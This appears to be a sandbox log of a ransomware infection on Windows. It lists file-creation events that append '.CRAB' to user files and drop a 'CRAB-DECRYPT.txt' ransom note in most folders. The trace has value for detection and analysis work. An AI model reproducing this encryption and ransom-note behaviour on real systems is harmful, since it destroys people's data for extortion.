Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\2Vbrq.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\Bw3EyZrv47e1v7E.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\C-qo UhjX19hGuulx.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\cQ Ou_FB.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\814gRnnAIVu.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\l9tgQ 9PaAWv.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\NVvReGOvgwf.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\SZZDb.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\EO4g\zFA_epfD.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\j2zxM9G02HBBmk1L4.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\KW_rm3.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\LwH2H16p1DpXA9la68-.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\TXO6XxR-Al.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\U8 T2YnIfI5_M4\YUQdzT83 8UwPM2Dgn2.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Searches\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Searches\Everywhere.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Searches\Indexed Locations.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\Videos\4gbR7sj0n62Q.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\hpkdRna.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\lFOkSft4ulW2w4\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\lFOkSft4ulW2w4\9HYpmeMmv_nE5ZvU7P.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\lFOkSft4ulW2w4\FXg5ixVFb3P9Q.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\rAryVmxCzc.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\HXHTmamEo7O.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\ioXIUKu7WS7.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\jODh7JyDl3.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\S5DVNRq.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\TY45FQwdFMEvz9HQK.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\VG4E\z8M Em99UvnyIpUAjU.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\WQ-z.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\xTYVMlA8h3FqJb1g.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\6NvllwUDraZuHx\xXas.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\aa521y JJ.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\CdOTva8QYqRPVyalhA-k.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\K xZfB79R806y\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\hedN4jG8.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\plYj-RMPqAKDhJxp0.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\SF5e.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\XD1d752MBOe-.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\Z2jUZYGkRuJ4AtcvP.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\OyB0rLb8gTLHCwKJF\_wjoV rKD fcbwhOrdM.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\pGJX O_.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\Qg8m5AfKY\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Videos\Qg8m5AfKY\-DTD6QdNAcQc7SV_1fcg.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\Qg8m5AfKY\vixAlARu-BB.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Videos\Qg8m5AfKY\xNsK70lxla.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\01_Music_auto_rated_at_5_stars.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\02_Music_added_in_the_last_month.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\03_Music_rated_at_4_or_5_stars.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\04_Music_played_in_the_last_month.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\05_Pictures_taken_in_the_last_month.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\06_Pictures_rated_4_or_5_stars.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\07_TV_recorded_in_the_last_week.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\08_Video_rated_at_4_or_5_stars.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\09_Music_played_the_most.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\10_All_Music.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\11_All_Pictures.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\12_All_Video.wpl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
